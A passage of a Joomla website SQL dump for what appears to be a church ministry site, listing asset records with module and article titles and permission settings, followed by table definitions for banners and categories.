(225, 18, 320, 321, 2, 'com_modules.module.173', 'Dream Centre Headquarters', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(226, 18, 322, 323, 2, 'com_modules.module.267', 'Dream Centre United Kingdom', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(227, 18, 324, 325, 2, 'com_modules.module.268', 'Banners', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(228, 18, 326, 327, 2, 'com_modules.module.269', 'Cape Town', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(229, 27, 41, 42, 3, 'com_content.article.96', 'Color Styles', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(230, 27, 43, 44, 3, 'com_content.article.97', 'Admin Panel', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(231, 18, 328, 329, 2, 'com_modules.module.226', 'Who\'s Online', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(232, 18, 330, 331, 2, 'com_modules.module.347', 'Calendar Events', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(233, 18, 332, 333, 2, 'com_modules.module.348', 'Scripture for the Week', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(235, 18, 334, 335, 2, 'com_modules.module.216', 'Popup Widget', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(236, 18, 336, 337, 2, 'com_modules.module.218', 'Popup Widget', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(237, 18, 338, 339, 2, 'com_modules.module.220', 'Popup C Widget', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(238, 18, 340, 341, 2, 'com_modules.module.105', '120 Converts', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(239, 18, 342, 343, 2, 'com_modules.module.172', 'Contact Us', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(240, 18, 344, 345, 2, 'com_modules.module.42', 'Sidebar Menu', ''),
(241, 18, 346, 347, 2, 'com_modules.module.103', 'Text Widget', ''),
(242, 18, 348, 349, 2, 'com_modules.module.104', 'Text Widget 2', ''),
(243, 18, 350, 351, 2, 'com_modules.module.43', 'Sidebar A', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(244, 18, 352, 353, 2, 'com_modules.module.44', 'Sidebar A', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(245, 18, 354, 355, 2, 'com_modules.module.340', 'Sidebar A', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(246, 18, 356, 357, 2, 'com_modules.module.341', 'Sidebar A', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(247, 18, 358, 359, 2, 'com_modules.module.342', 'Sidebar A', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(248, 18, 360, 361, 2, 'com_modules.module.41', 'Sub Menu', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(249, 18, 362, 363, 2, 'com_modules.module.316', 'Accordion List', '{}'),
(253, 18, 364, 365, 2, 'com_modules.module.48', 'Latest News', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(254, 18, 366, 367, 2, 'com_modules.module.49', 'Login', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(255, 18, 368, 369, 2, 'com_modules.module.403', 'Popular Tags', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(256, 1, 888, 889, 1, '#__ucm_content.2', '#__ucm_content.2', '[]'),
(257, 1, 890, 891, 1, '#__ucm_content.3', '#__ucm_content.3', '[]'),
(258, 1, 892, 893, 1, '#__ucm_content.4', '#__ucm_content.4', '[]'),
(259, 102, 121, 122, 3, 'com_content.article.98', 'Inspiration comes from within', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(260, 102, 123, 124, 3, 'com_content.article.99', 'Audio jungle comes alive', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(261, 1, 894, 895, 1, '#__ucm_content.5', '#__ucm_content.5', '[]'),
(262, 18, 370, 371, 2, 'com_modules.module.17', 'Breadcrumbs', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(263, 18, 372, 373, 2, 'com_modules.module.106', 'Text Widget 2', ''),
(264, 18, 374, 375, 2, 'com_modules.module.404', 'Social Icons', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(265, 18, 376, 377, 2, 'com_modules.module.405', 'Social Icons', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(266, 18, 378, 379, 2, 'com_modules.module.330', 'Bottom-d module', ''),
(267, 18, 380, 381, 2, 'com_modules.module.313', 'Small lighthouse logo', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(268, 18, 382, 383, 2, 'com_modules.module.71', 'White Block', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(269, 18, 384, 385, 2, 'com_modules.module.73', 'White Block', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(270, 18, 386, 387, 2, 'com_modules.module.34', 'Inner Bottom', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(271, 18, 388, 389, 2, 'com_modules.module.406', 'Sidebar B', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(272, 18, 390, 391, 2, 'com_modules.module.407', 'Sidebar B', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(273, 18, 392, 393, 2, 'com_modules.module.22', 'Bottom A', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(274, 18, 394, 395, 2, 'com_modules.module.21', 'Bottom A', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(275, 18, 396, 397, 2, 'com_modules.module.35', 'Inner Bottom', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(276, 18, 398, 399, 2, 'com_modules.module.27', 'Bottom B', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(277, 18, 400, 401, 2, 'com_modules.module.28', 'Bottom B', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(278, 18, 402, 403, 2, 'com_modules.module.29', 'Bottom B', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(279, 18, 404, 405, 2, 'com_modules.module.30', 'Bottom B', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(280, 18, 406, 407, 2, 'com_modules.module.408', 'Sidebar A', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(281, 18, 408, 409, 2, 'com_modules.module.391', 'Banner position', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(282, 27, 47, 48, 3, 'com_content.article.100', 'RTL Language Ready', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(284, 18, 410, 411, 2, 'com_modules.module.410', 'Sidebar A', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(285, 18, 412, 413, 2, 'com_modules.module.411', 'Sidebar B', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(286, 18, 414, 415, 2, 'com_modules.module.357', 'Gallery', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(288, 18, 416, 417, 2, 'com_modules.module.364', 'Welcome to Lighthouse', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(289, 1, 896, 897, 1, 'com_rokcandy.category.34', 'Basic', ''),
(290, 1, 898, 899, 1, 'com_rokcandy.category.35', 'Typography', ''),
(291, 1, 900, 901, 1, 'com_rokcandy.category.36', 'Uncategorised', ''),
(292, 1, 902, 903, 1, 'com_rokcandy', 'rokcandy', '{}'),
(293, 18, 418, 419, 2, 'com_modules.module.344', 'Right Toolbar', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(294, 18, 420, 421, 2, 'com_modules.module.136', 'Left Toolbar', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(295, 18, 422, 423, 2, 'com_modules.module.248', 'Bottom Menu', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(297, 18, 424, 425, 2, 'com_modules.module.63', 'Top A', ''),
(298, 18, 426, 427, 2, 'com_modules.module.64', 'Top A', ''),
(299, 18, 428, 429, 2, 'com_modules.module.65', 'Top A', ''),
(301, 18, 430, 431, 2, 'com_modules.module.412', 'About Us', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(306, 1, 910, 911, 1, 'com_widgetkit', 'Widgetkit', '{}'),
(307, 314, 191, 192, 3, 'com_content.article.101', 'Dream Centre Ordained Pastors', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(308, 18, 432, 433, 2, 'com_modules.module.413', 'Logo', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(309, 27, 51, 52, 3, 'com_content.article.102', 'Our Founder (2)', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(310, 27, 53, 54, 3, 'com_content.article.103', 'Dream Centre Ordained Pastors', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(311, 18, 434, 435, 2, 'com_modules.module.362', 'Vertical Menu', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(312, 27, 55, 56, 3, 'com_content.article.104', 'Dream Centre Ordained Pastors (2)', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(313, 74, 109, 110, 3, 'com_content.article.105', 'Pastors', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(314, 8, 190, 229, 2, 'com_content.category.37', 'loic', '{}'),
(315, 314, 195, 196, 3, 'com_content.article.106', 'Dream Centre Ordained Pastors (2)', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(316, 314, 197, 198, 3, 'com_content.article.107', 'Our Belief', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(317, 18, 436, 437, 2, 'com_modules.module.359', 'About Us', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(318, 314, 199, 200, 3, 'com_content.article.108', 'YouTube Live', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(319, 18, 438, 439, 2, 'com_modules.module.414', 'Jumi', '{}'),
(320, 1, 912, 913, 1, 'com_jumi', 'com_jumi', '{}'),
(321, 16, 246, 247, 2, 'com_menus.menu.12', 'Live Streaming', '{}'),
(322, 18, 440, 441, 2, 'com_modules.module.415', 'Live Streaming', '{}'),
(323, 18, 442, 443, 2, 'com_modules.module.361', 'Tabs module', '{}'),
(324, 314, 201, 202, 3, 'com_content.article.109', 'Periscope Live', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(325, 314, 203, 204, 3, 'com_content.article.110', 'Facebook Live', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(326, 18, 444, 445, 2, 'com_modules.module.416', 'Live Chat', '{}'),
(327, 314, 205, 206, 3, 'com_content.article.111', 'Podcast ', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(329, 314, 207, 208, 3, 'com_content.article.112', 'Video on Demand', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(332, 314, 209, 210, 3, 'com_content.article.113', 'Broadcast Schedule', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(338, 1, 914, 915, 1, 'com_phocadownload', 'com_phocadownload', '{}'),
(339, 314, 211, 212, 3, 'com_content.article.114', 'Men in Ministry Mentor ship Programme', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(340, 314, 213, 214, 3, 'com_content.article.115', 'Women in Ministry Mentor ship Programme', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(341, 314, 215, 216, 3, 'com_content.article.116', 'Anointed Family Heads', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(342, 314, 217, 218, 3, 'com_content.article.117', 'Young Achievers', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(343, 314, 219, 220, 3, 'com_content.article.118', 'Daughters of Destiny', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(344, 314, 221, 222, 3, 'com_content.article.119', 'Happily Married Women', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(345, 314, 223, 224, 3, 'com_content.article.120', 'Teens in Destiny', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(346, 18, 446, 447, 2, 'com_modules.module.421', 'Home Side Banner', '{}'),
(347, 314, 225, 226, 3, 'com_content.article.121', 'Branches', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(348, 161, 869, 870, 2, 'com_jevents.category.38', 'LOIC', '{}'),
(349, 18, 448, 449, 2, 'com_modules.module.422', 'Upcoming Events (copy)', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(350, 27, 57, 58, 3, 'com_content.article.122', 'Partnership', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(351, 1, 916, 917, 1, 'com_joomailermailchimpintegration', 'JoomailerMailchimpIntegration', '{}'),
(352, 18, 450, 451, 2, 'com_modules.module.423', 'Join Our Mailing List', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(353, 18, 452, 453, 2, 'com_modules.module.424', 'MailChimp Stats', '{}'),
(354, 18, 454, 455, 2, 'com_modules.module.425', 'Join Our Mailing List', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(355, 18, 456, 457, 2, 'com_modules.module.32', 'Copyright info', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(356, 18, 458, 459, 2, 'com_modules.module.426', 'First Timer Form', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(358, 18, 460, 461, 2, 'com_modules.module.427', 'streaming', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(359, 18, 462, 463, 2, 'com_modules.module.1', 'Main Menu', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(360, 16, 248, 249, 2, 'com_menus.menu.14', 'streaming', '{}'),
(361, 18, 464, 465, 2, 'com_modules.module.428', 'streaming', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(362, 27, 59, 60, 3, 'com_content.article.123', 'Monthly Bible Reading', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(363, 1, 918, 919, 1, 'com_jlexblock', 'COM_JLEXBLOCK', '{}'),
(364, 27, 61, 62, 3, 'com_content.article.124', 'Partnership Application', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(365, 18, 466, 467, 2, 'com_modules.module.429', 'Facebook Live Message', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(366, 18, 468, 469, 2, 'com_modules.module.430', 'Chat', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(367, 27, 63, 64, 3, 'com_content.article.125', 'Private Streaming', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(368, 18, 470, 471, 2, 'com_modules.module.431', 'Module - Facebook Comments By Internet Partner', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(369, 27, 65, 66, 3, 'com_content.article.126', 'Pastoral Training', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(370, 1, 920, 921, 1, 'com_fields', 'com_fields', '{}'),
(371, 1, 922, 923, 1, 'com_associations', 'com_associations', '{}'),
(372, 314, 227, 228, 3, 'com_content.article.127', 'Dream Centre Ordained Pastors (3)', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(373, 27, 67, 68, 3, 'com_content.article.128', 'GOBC 2017 Online Registration', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),
(386, 1, 924, 925, 1, 'com_jce', 'COM_JCE', '{}'),
(387, 27, 69, 70, 3, 'com_content.article.129', '35 years of heeding the call', '{}'),
(388, 18, 472, 473, 2, 'com_modules.module.432', 'Sj Newsletter Popup', '{}'),
(389, 1, 926, 927, 1, 'com_sj_newsletter', 'com_sj_newsletter', '{}'),
(390, 1, 928, 929, 1, 'com_rstbox', 'COM_RSTBOX', '{}'),
(391, 1, 930, 931, 1, 'com_convertforms', 'COM_CONVERTFORMS', '{}'),
(392, 18, 474, 475, 2, 'com_modules.module.433', 'Convert Forms', '{}'),
(393, 18, 476, 477, 2, 'com_modules.module.434', 'Vina YouTube Channel', '{}'),
(394, 1, 932, 933, 1, 'com_privacy', 'com_privacy', '{}'),
(395, 1, 934, 935, 1, 'com_actionlogs', 'com_actionlogs', '{}'),
(396, 27, 71, 72, 3, 'com_content.article.130', 'Instructions for Online Registration and Check-in for School of the Calling', '{}');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_associations`
--

CREATE TABLE `y57u5_associations` (
  `id` int(11) NOT NULL COMMENT 'A reference to the associated item.',
  `context` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The context of the associated item.',
  `key` char(32) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The key for the association computed from an md5 on associated ids.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_banners`
--

CREATE TABLE `y57u5_banners` (
  `id` int(11) NOT NULL,
  `cid` int(11) NOT NULL DEFAULT '0',
  `type` int(11) NOT NULL DEFAULT '0',
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `imptotal` int(11) NOT NULL DEFAULT '0',
  `impmade` int(11) NOT NULL DEFAULT '0',
  `clicks` int(11) NOT NULL DEFAULT '0',
  `clickurl` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `catid` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `description` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `custombannercode` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `sticky` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `metakey` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `own_prefix` tinyint(1) NOT NULL DEFAULT '0',
  `metakey_prefix` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `purchase_type` tinyint(4) NOT NULL DEFAULT '-1',
  `track_clicks` tinyint(4) NOT NULL DEFAULT '-1',
  `track_impressions` tinyint(4) NOT NULL DEFAULT '-1',
  `checked_out` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `reset` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created_by` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `version` int(10) UNSIGNED NOT NULL DEFAULT '1'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_banner_clients`
--

CREATE TABLE `y57u5_banner_clients` (
  `id` int(11) NOT NULL,
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `contact` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `email` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `extrainfo` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `checked_out` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `metakey` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `own_prefix` tinyint(4) NOT NULL DEFAULT '0',
  `metakey_prefix` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `purchase_type` tinyint(4) NOT NULL DEFAULT '-1',
  `track_clicks` tinyint(4) NOT NULL DEFAULT '-1',
  `track_impressions` tinyint(4) NOT NULL DEFAULT '-1'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_banner_tracks`
--

CREATE TABLE `y57u5_banner_tracks` (
  `track_date` datetime NOT NULL,
  `track_type` int(10) UNSIGNED NOT NULL,
  `banner_id` int(10) UNSIGNED NOT NULL,
  `count` int(10) UNSIGNED NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_categories`
--

CREATE TABLE `y57u5_categories` (
  `id` int(11) NOT NULL,
  `asset_id` int(10) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `parent_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `lft` int(11) NOT NULL DEFAULT '0',
  `rgt` int(11) NOT NULL DEFAULT '0',
  `level` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `path` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `extension` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
